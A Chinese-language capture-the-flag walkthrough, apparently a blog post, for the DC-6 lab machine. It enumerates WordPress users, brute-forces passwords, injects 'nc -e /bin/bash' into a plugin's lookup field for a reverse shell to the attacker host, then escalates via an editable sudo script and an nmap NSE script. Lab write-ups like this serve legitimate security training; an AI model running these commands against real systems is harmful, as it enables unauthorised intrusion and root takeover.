靶机:DC-6

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.169 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.169

二、漏洞探测

访问80端口,无法访问,需要修改dns文件

添加以下内容后再次访问,得到如下页面,提示是wordpress

192.168.236.169 wordy

用whatweb查看一下具体信息

whatweb -v http://192.168.236.169

可知是word press和apache搭建的网站,用wpscan来扫描一下用户

wpscan --url http://wordy/ --enumerate u

发现以下用户

admin graham mark sarah jens

将其保存下来,以便后续爆破

官网提示

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破账号密码

wpscan --url http://wordy/ -U usernames.txt -P passwords.txt

mark:helpdesk01

登录后台

http://wordy/wp-admin/

侧边栏里面有个activity monitor插件, 去漏洞库搜一下这个插件是否有漏洞

WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection - PHP webapps Exploit

三、GetShell

漏洞利用地址

http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup

拼接如下命令

baidu.com | nc -e /bin/bash 192.168.236.137 4444

kali监听

nc -lvvp 4444

反弹回shell

python开启交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在以下目录中,发现提示信息

cd /home/mark/stuff

ssh登录

graham:GSo7isUM1D4

ssh graham@192.168.236.169

四、提权

查看当前用户可执行的操作

sudo -l

发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本

cat /home/jens/backups.sh

向这个脚本写入命令,让jens这个用户来执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

已经切换到jens用户,查看这个用户可以执行的命令

看到一个nmap,需要nmap打开一个shell即可获得root权限

nmap中执行shell方法

echo "os.execute('/bin/bash')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

至此成功提权,当前shell不显示命令,需要盲打

查看flag

cd /root
cat theflag.txt

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值